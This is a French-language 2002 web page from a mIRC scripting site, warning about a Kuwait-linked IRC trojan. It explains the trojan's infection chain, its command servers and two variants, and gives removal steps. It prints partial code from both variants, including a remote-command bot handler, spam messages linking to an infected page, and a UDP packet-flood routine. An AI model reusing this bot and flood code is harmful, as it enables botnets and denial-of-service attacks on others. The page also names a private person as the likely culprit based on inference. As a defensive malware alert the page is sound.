Vos identifiants
Accueil T'chat
Bienvenue
Voir tous les scripts
Pour mirc 6.1 et moins
Pour mirc 6.2
Pour mirc 6.3
Pour mirc 7.1
Top 10
Vous aimez ou détestez
Soumettre un script
Foire aux questions
Forum de discussion

Rechercher par mots clés:
Tous les mots  
Un des mots  
Expression exacte  

4073640 visiteurs dont 6 en ligne

Thème du site

Bon trucs
Les bases du Scripting
Le virus "irc.worm.gen"
Le mIRC D'Or
Snippets
ScreenShots
Le Défi du moment
Tag-moi-ça
Le Pire de l'IRC
L'IRC pour les nuls
Tutoriaux
Configurer UnrealIRCD
Configurer votre box
Sans rapport direct
Attention à l'arnaque!
Usenet et les News
Arrêter de fumer
Un peu d'orthographe
Par l'auteur
Unreal/Anope Admin
mIRC Script Server
Proxy Web Chat
Magneto for Unreal
Super Poupées
Tour de cartes
Le site
L'Equipe
Partenariat
Administration
Partenaires

Web Of Trust
www.chat.exolia.net (Francophone)
fantasya.org (Francophone)

                                            

Alerte au virus du Koweit!!

(English translation here)

Organisation du document

  • Présentation du virus
  • Comment peut-on être vérolé
  • Fonctionnement du virus
  • Les deux variantes trouvées
  • Vérifier si vous êtes sensible à ce virus
  • Que faire en cas d'infection
  • Ma contribution, et conclusion


    • Depuis peu (début janvier 2002), une nouvelle vague de troyens très vicieux est entrain de déferler sur le Net. Ils semblent avoir été créés à la base par un jeune Koweitien, mais rien n'est sûr, car les hackers aiment bien brouiller les pistes. Ces troyens ne se propagent ni par courrier, ni par des dcc send classiques par irc: leur méthode de propagation est beaucoup plus ingénieuse et transparente.

    Comment peut-on être vérolé?

     Tout simplement en surfant! Et cela grâce a un trou de sécurité connu, qui a été comblé par Microsoft depuis. Si vous avez l'habitude de jeter un coup d'oeil sur les pages web dont des inconnus vous envoient une url au travers d'un private message, sachez que vous avez peut-être, si votre PC n'est pas patché, téléchargé et exécuté à votre insu un script vbs très dangereux.

    J'ai répertorié dans ce site les quelques pages que j'ai trouvées. Bien entendu, elles sont hébergées dans ce site et j'ai retiré le code viral: le but est seulement de les porter à votre connaissance. Si vous avez déjà vu un des ces pages (liste non exhaustive), lisez la suite...

  • Page sur ayna.com (supprimée depuis peu)
  • Page sur geocities
  • Page sur homepagez
  • Page sur stormpages

    • Que fait ce virus et comment fonctionne-t-il?

     Le mécanisme du virus, bien huilé, fonctionne en 5 étapes:

  • 1) D'abord vous recevez une invitation automatique d'une personne qui n'en est pas consciente, à visiter un site vérolé. Vous décidez alors de visiter ce site.
  • 2) Une fois la page web du site téléchargée, un javascript inclus dans le code source de la page écrit sur votre disque dur un fichier .vbs (langage de programmation Windows Scripting Host) et l'exécute. Oui cela est possible: du javascript qui écrit sur votre disque dur! Le javascript infectieux de cette page web exploite un trou de sécurité connu d'Internet Explorer et de Windows, utilisant à cette fin une applette java. Personnellement je n'ai pas ce trou de sécurité, j'utilise Win2000 Pro service Pack 2 avec tous les derniers patches en date de Microsoft, mais la plupart d'entre vous utilisent encore Windows 98, et n'avez sûrement jamais pensé à télécharger les patches de Microsoft. Le hacker semble compter là-dessus malheureusement. Cette faille est connue (elle a été baptisée Js.Exception.Exploit et a été découverte à la fin de l'an 2000), aussi est-il vraisemblable que les utilisateurs de Win XP n'aient pas a s'en inquiéter.
  • 3) Le fichier vbs exécuté, qui est assez compliqué du point de vue du code, a pour but d'insérer un script .ini dans votre mirc. Pour cela il écrit un fichier baptisé server.ini dans le dossier de mirc, et modifie mirc.ini a telle fin que mirc le prenne en compte dans sa liste de scripts. Lors de votre prochaine session mirc, le script devient alors opérationnel.
  • 4) Au moment ou vous vous connectez sur votre serveur favori, (mettons un serveur Undernet), le script se déclenche par l'événement ON CONNECT, et connecte discrètement un socket à votre insu sur un serveur irc koweitien. L'adresse de ce serveur varie en fonction du virus: j'ai répertorié actuellement 2 serveurs: irc.q8sharks.org et irc.alshab7.com. Votre connection porte évidemment votre adresse ip, et joint un canal secret sur ce serveur, dont le nom diffère aussi en fonction du virus.
  • 5) C'est là que les objectifs des scripts diffèrent: j'ai répertorié 2 formes: la première, particulièrement diabolique, que j'ai baptisée Aladin, la deuxieme, que j'ai baptisée Alshab7. Mais je sais qu'il y en a d'autres!!

    Dans tous les cas, sous les injonctions de l'opérateur du canal (vraisemblablement le créateur du virus), le script mirc va contrôler vos actions.

    La variante Aladin: le hacker va vous faire télécharger et exécuter des applications, notamment le fichier crack.exe de 618K situé sur http://home.dal.net/madlover/ (fermé depuis aujourd hui 25/1/02 grâce à la complicité d'un ami influent sur Dalnet). Le script mirc contient en effet toutes les lignes nécessaires au téléchargement de fichiers binaires depuis le Web, grâce à un système de sockets assez perfectionné utilisant les variables binaires. J'imagine sans peine que crack.exe est une sorte de troyen dérivé de netbus, pouvant éventuellement permettre la visualisation du contenu de votre disque dur, peut-être vous transformer en serveur wingate avec tous les inconvénients que cela peut imposer (je n'en sais rien, je ne l'ai pas essayé et je ne le ferai pas!) et enfin, ce programme pourrait vraisemblablement permettre d'organiser des attaques massives de clones, tous avec des adresses ip différentes (les vôtres!), sans seulement que vous en soyez conscients. J'ai ainsi compté environ 400 connexions dans le canal en une soirée, c'est vous dire si ce virus est performant!

    La variante Alshab7: le script est incapable de télécharger un fichier, cependant il a été conçu pour pouvoir connecter un ou plusieurs sockets sur un serveur choisi par le hacker, et pour flooder des canaux, eux aussi choisis. L'objectif d'un tel script est à l'évidence de pouvoir constituer une armée de clones possédant tous un adresse ip différente (les vôtres), et ce, toujours à l'insu des personnes vérolées.

    • Comment savoir si je suis vérolé?

     Tout d'abord, pour savoir si vous êtes vulnérable à ce trou de sécurité, j'ai créé une page qui reproduit volontairement le principe de ce virus, sans toutefois causer le moindre dommage à votre disque dur: elle n'affichera seulement qu'un texte si elle fonctionne. Votre antivirus détectera peut-être la présence d'un trojan et vous empêchera d'afficher la page s'il est bien fait. Si oui, tant mieux!

    Attention toutefois, à propos de cette page j'ai eu plusieurs échos comme quoi elle pouvait totalement planter votre système (écran bleu), surtout si vous avez Norton Antivirus. Vous serez prévenus!

    Pour savoir si vous êtes vulnérable, veuillez cliquer ici


    Pour savoir si vous êtes vérolé, plusieurs traces: d'abord le script envoie un message privé ON JOIN et parfois ON PART, faisant de la pub pour la page web contenant le troyen. Ensuite, il devrait avoir un fichier nommé crack.exe dans votre dossier download si, par malheur, vous avez été victime de la variante Aladin. Enfin, vous devez avoir dans votre client mirc habituel un script supplémentaire, probablement appelé server.ini, qui contient des instructions de connexion par socket. Pour ceux qui ne sont pas habitués au scripting, tapez Alt-R et cliquez sur le menu View: cela affiche la liste des scripts utilisés par mirc.

    Pour information, je reproduit le début du code de la variante Aladin:


    on 1:START:{ if ($ip != 127.0.0.1) { //sskk } }
    on *:sockclose:bot*:/.timers off | /.timer 1 3 //sskk
    on *:Sockopen:bot*:{
    if ($sockerr > 0) { halt }
    set -u1 %user BaBa-0 $+ $rand(1,99999)
    .sockwrite -nt $sockname USER %user %user %user : $+ $me
    .sockwrite -nt $sockname NICK %user
    .sockwrite -tn $sockname join #Knight | .timer $+ AntiTimeOut 0 50 .sockwrite -nt $sockname PRIVMSG %user : $+ 15reHuShing
    }
    ...

    Voici le début du code de la variante Alshab7:


    on 1:JOIN:#:/msg $nick 4,1http://www.storm0pages.com/xks4x/Ghost.html 0<=- Çæá ãæÞÚ ÊæÌÏ Èå ÌãíÚ ÇÔßÇá ÇáÌä
    on 1:part:#:/msg $nick 4,1http://www.storm0pages.com/xks4x/Ghost.html 0<=- Çæá ãæÞÚ ÊæÌÏ Èå ÌãíÚ ÇÔßÇá ÇáÌä
    alias packt { .sockwrite -n $sockname privmsg # : $+ Now [Packeting] $1 [with] $2 [bytes] $3 [times] | set %packet.ip $1 | set %packet.bytes $2 | set %packet.amount $3 | set %packet.count 0 | set %packet.port $rand(1,6) $+ $rand(0,6) $+ ($rand(0,6) $+ $rand(0,9) | :start | if (%packet.count >= %packet.amount) { sockclose packet | unset %packet.* | .sockwrite -n $sockname privmsg #1478 : $+ Packeting Has Completed .... | halt } | inc %packet.count 1| /.sockudp -b packet 60 %packet.ip %packet.port %packet.bytes %packet.bytes | goto start }
    on *:TEXT:*www*:?:{ var %invito = $comchan($nick,0) | closemsg $nick | ignore $nick }
    on *:TEXT:*http*:?:{ var %invito = $comchan($nick,0) | closemsg $nick | ignore $nick }
    on *:sockread:bo*: { sockread %botread | set %nickl1 $gettok(%botread,1,32) | set %nickl2 $left(%nickl1,8) | set %nickf $right(%nickl2,7) | if ($gettok(%botread,5,32) == ALShaB7) && (%nickf == ALShaB7) { $gettok(%botread,6-,32) } }
    ...

    Horreur j'ai l'un de ces scripts!!! Que faire?

     Pas de panique, mais attention tout de même, vu que je n'ai aucune idée de ce que peut faire le fichier crack.exe, ni de ce que le hacker a pu vous faire télécharger en plus si vous avez eu le malheur de tomber sur la variante Aladin. Je ne peux pas non plus vous garantir que votre PC n'a pas été visité, voire modifié. J'ai envoyé un E-mail à Symantec en les sensibilisant sur le problème, avec toutes les urls que je vous ai citées. J'espère qu'ils fourniront rapidement un moyen de supprimer les effets de crack.exe. Si, de plus, vous avez une idée à qui je peux en parler, n'hésitez pas à m'écrire. La seule chose que je peux vous recommander dans tous les cas, est d'abord d'unloader le script ( /unload -rs server.ini ), et ensuite de taper /sockclose * pour fermer tous les sockets en cours.

    Dernières nouvelles

     Il semblerait qu'il existe d'autres troyens du même genre, créés par la même personne. Ainsi le serveur realserver.q80.net port 3257 a un ircop nommé aladin, et un chan #aladinizback très rempli de connexions par socket.

    Ce qui semble maintenant SUR c'est que c'est très probablement la même personne qui a écrit tous ces codes viraux, car les serveurs sur lesquels les victimes se connectent a leur insu, dans chacune de ces deux variantes, sont hébergés tous les deux sur des domaines au nom de l'entreprise Kuwaitnet.

    Le serveur de la variante Aladin est en effet irc.q8sharks.org et le serveur de la variante alshab7) est irc.alshab7.com. Ces deux noms de domaine ont été réservés par un certain Bashar AlAbdulhadi, qui, d'après mon enquête, est l'administrateur de Kuwaitnet.

    J'ai envoyé un E-mail a Aladbulhadi avec accusé de réception pour lui préciser que les domaines q8sharks.org et alshab7.com avaient été réservés (ou hackés) dans le but de servir les sombres desseins d'un ou de plusieurs hackers, et il m'a promis qu'il agirait en conséquences. S'il ferme les serveurs irc sus-nommés, les vérolés ne risquent évidemment plus rien.

    Il est maintenant quasi certain que la nationalité du hacker est koweitienne, de par le choix des serveurs, de l'entreprise qui lui a loué ou vendu les noms de domaine, des pages web vérolées contenant des caractères arabes... De plus, un ami influent sur Dalnet qui m'a beaucoup aidé dans mon enquête a eu l'occasion de discuter avec le hacker: l'heure de son PC correspond au fuseau horaire passant par le Koweit (Soit heure française + 2).

    Vraies ou fausses pistes? Affaire à suivre!!